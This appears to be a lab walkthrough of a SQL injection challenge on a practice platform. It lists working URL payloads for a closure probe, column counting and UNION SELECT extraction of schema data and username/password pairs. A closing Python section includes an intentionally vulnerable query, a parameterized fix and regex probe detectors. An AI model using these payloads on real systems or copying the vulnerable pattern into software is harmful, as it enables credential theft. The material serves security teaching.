![982bd8acf3c54f26f3866063f7b09f8d.png](https://i-blog.csdnimg.cn/blog_migrate/1c1c53b009cd39423f7521e937751377.jpeg)
![0385b6644d0b7b9057e2dde09d055b79.png](https://i-blog.csdnimg.cn/blog_migrate/27f3aa6fb65b55c8acf5d0460bed83b4.jpeg)
SQL injection online practice platform (http://leettime.net)
![b7ab66a3ac0ed7a4017d8d9f57d31be1.png](https://i-blog.csdnimg.cn/blog_migrate/c8aa1abbe0712e2938a52a3f552a44a2.jpeg)
Practice: basic module 4
![dbc1ad41daf6116d7c182714778919c6.png](https://i-blog.csdnimg.cn/blog_migrate/b19f62038763f95e335267f340e758f4.jpeg)
1. Determine the closing character and the number of columns
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1
![bdf7ebefa974b9f8edf66243d730078f.png](https://i-blog.csdnimg.cn/blog_migrate/9f0885040ae214597e015454a78df5de.jpeg)
The page displays normally.
Closing with a double quote `"` still shows the normal page, so `"` is not the closing character.
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22
![26c3de27f1d4e199755a91ca430ef444.png](https://i-blog.csdnimg.cn/blog_migrate/3a73061439ca21ce8dc346933e1c0e62.jpeg)
Closing with a double quote followed by a single quote `"'` shows an error page, so `"'` is not the closing character either (the single quote is what breaks the query).
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22%27
![67c8cd41d509e2bc6cf736e424f335e5.png](https://i-blog.csdnimg.cn/blog_migrate/143338bc93915cd256a519486bffb320.jpeg)
From the screenshot there is also a parenthesis `)` in the query.
Trying the closure `')` followed by the comment `-- -` succeeds.
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20or%201=1%20--%20-
![906bf8df37e01d8e59e54ef3d0629842.png](https://i-blog.csdnimg.cn/blog_migrate/24b8ac4d8cf3c709d0aa70ce1372c08d.jpeg)
Next, find the number of columns in the query.
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%202%20--%20-
![3b0c89fb68a2050901bdc5f81e0d66cf.png](https://i-blog.csdnimg.cn/blog_migrate/77f03c580e7ab517dc8669ea69499bd6.jpeg)
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%204%20--%20-
![b65b8a8b87ca17257e95dcd5a8b22486.png](https://i-blog.csdnimg.cn/blog_migrate/c14325a32214b6cb5d64a1eef82ec6eb.jpeg)
`order by 5 -- -` produces an error, which shows the query returns 4 columns.
![fa5926753ce5f032e179ab9a5e6a2b5c.png](https://i-blog.csdnimg.cn/blog_migrate/6ea8b30c0aceed7227a0f50ac32c9db3.jpeg)
2. Find the echo point and extract data
![7ba8704b21bd58e0613dbf30995b3bac.png](https://i-blog.csdnimg.cn/blog_migrate/e05441ad2f636fe5686d4b19aa72e704.jpeg)
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,2,3,4%20--%20-
![87b6971547103f57c4671c7637d0b814.png](https://i-blog.csdnimg.cn/blog_migrate/07bd274cf14eabf8300f763aa406016b.jpeg)
The second column is echoed on the page, so query results can be returned through it.
Query the database name: leettime_761wHole
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,database(),3,4%20--%20-
![92f573f13ca461e351bf8d9990d27f16.png](https://i-blog.csdnimg.cn/blog_migrate/7b36b2d000bc5d75e5f274ca3e74184c.jpeg)
Query the database installation path with `@@basedir`: /usr/
![ced46ed9c6bbbdc0138770d63ce76d2f.png](https://i-blog.csdnimg.cn/blog_migrate/244f118a658f435776fef8451048c4d2.jpeg)
![e7cbeaab3a44e5d3d96948bb109d648c.png](https://i-blog.csdnimg.cn/blog_migrate/247bccf999e0c490ede182b8155aeea2.jpeg)
Find the table names: testtable1, userlogs, users
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27leettime_761wHole%27),3,4%20--%20-
Find the column names: id, username, password, user_type, sec_code
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27leettime_761wHole%27%20and%20table_name=%27users%27),3,4%20--%20-
![c1fe3a1b70b261373a89b78713d57cf2.png](https://i-blog.csdnimg.cn/blog_migrate/c1e88da0dc88f5e1580f3e307e3b723f.jpeg)
Username is : #injector#khan#,#decompiler#hacktract#,#devilhunte#dante#,#Zen#sec-idiots#,#Zenodermus#security-i#,#grayhat#hacker#,#khan#haxor#,#admin#sadmin#
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(0x23,username,0x23,password,0x23)%20from%20leettime_761wHole.users),3,4%20--%20-
![8f40cebf8e1ea1fdaeaefd39244e3220.png](https://i-blog.csdnimg.cn/blog_migrate/bcf9d048087d46b6edf50b2bcf05ce08.jpeg)
Summary: get familiar with the structure of the information_schema tables, and with how group_concat is used.
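The walkthrough above never shows the server-side code, so the following is an added example (not the platform's own source) that reconstructs the bug the `')` closure implies and puts it next to the fix. It assumes the PHP page builds its query as `WHERE id=('...')` by string concatenation, uses an in-memory SQLite database with made-up rows in place of the challenge's MySQL backend, and adds a small request-log check that flags the kinds of probes used in steps 1 and 2. The function names, sample data and pattern names are all assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlparse

# Constructed sample rows. The column layout follows the users table the write-up
# recovers (id, username, password, user_type, sec_code); the values are made up.
SAMPLE_USERS = [
    (1, "alice", "pw-alice", "admin", "0001"),
    (2, "bob", "pw-bob", "user", "0002"),
]


def make_db():
    """In-memory SQLite database standing in for the challenge's MySQL backend."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER, username TEXT, password TEXT, "
        "user_type TEXT, sec_code TEXT)"
    )
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return con


def vulnerable_lookup(con, user_id):
    """Assumed bug: the parameter is pasted into the SQL text inside ('...'), which is
    the shape the ') closure found in step 1 implies. Quotes, parentheses and '--'
    in user_id are therefore parsed as SQL. Four columns are selected, matching the
    write-up's finding that 'order by 5' fails."""
    sql = f"SELECT id, username, user_type, sec_code FROM users WHERE id=('{user_id}')"
    return con.execute(sql).fetchall()


def safe_lookup(con, user_id):
    """Fix: bind the value as a parameter. The driver passes it separately from the
    statement text, so it is only ever compared against id, never parsed as SQL."""
    sql = "SELECT id, username, user_type, sec_code FROM users WHERE id=?"
    return con.execute(sql, (user_id,)).fetchall()


# Coarse request-log check: each name maps to a regex over the decoded query value.
# The patterns cover the probes seen in the write-up; a real deployment would tune
# them against its own traffic, since they are easy to evade and can false-positive.
PROBE_PATTERNS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.IGNORECASE),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE),
    "information_schema": re.compile(r"\binformation_schema\.", re.IGNORECASE),
}


def flag_request(url):
    """Return the names of the probe patterns present in any query parameter of url.
    parse_qs percent-decodes the values, so '%27)%20order%20by' is inspected as
    the text "') order by"."""
    found = []
    for values in parse_qs(urlparse(url).query).values():
        for value in values:
            for name, pattern in PROBE_PATTERNS.items():
                if name not in found and pattern.search(value):
                    found.append(name)
    return found


if __name__ == "__main__":
    con = make_db()
    probe = "1') or 1=1 -- -"  # the closure probe from step 1
    print("vulnerable:", vulnerable_lookup(con, probe))  # every row comes back
    print("safe      :", safe_lookup(con, probe))        # nothing matches
    print(flag_request(
        "http://leettime.net/sqlninja.com/tasks/basic_ch4.php"
        "?id=1%27)%20order%20by%202%20--%20-"
    ))  # ['order_by_probe']
```

With the concatenated query, the step-1 probe returns every row and the step-2 `union select 1,2,3,4` probe returns a fabricated row, which is exactly the echo point the write-up uses; with the bound parameter both probes return nothing, because the whole string is compared against the integer `id` column rather than spliced into the statement. The log check is a secondary control for noticing this kind of probing; parameter binding is the fix.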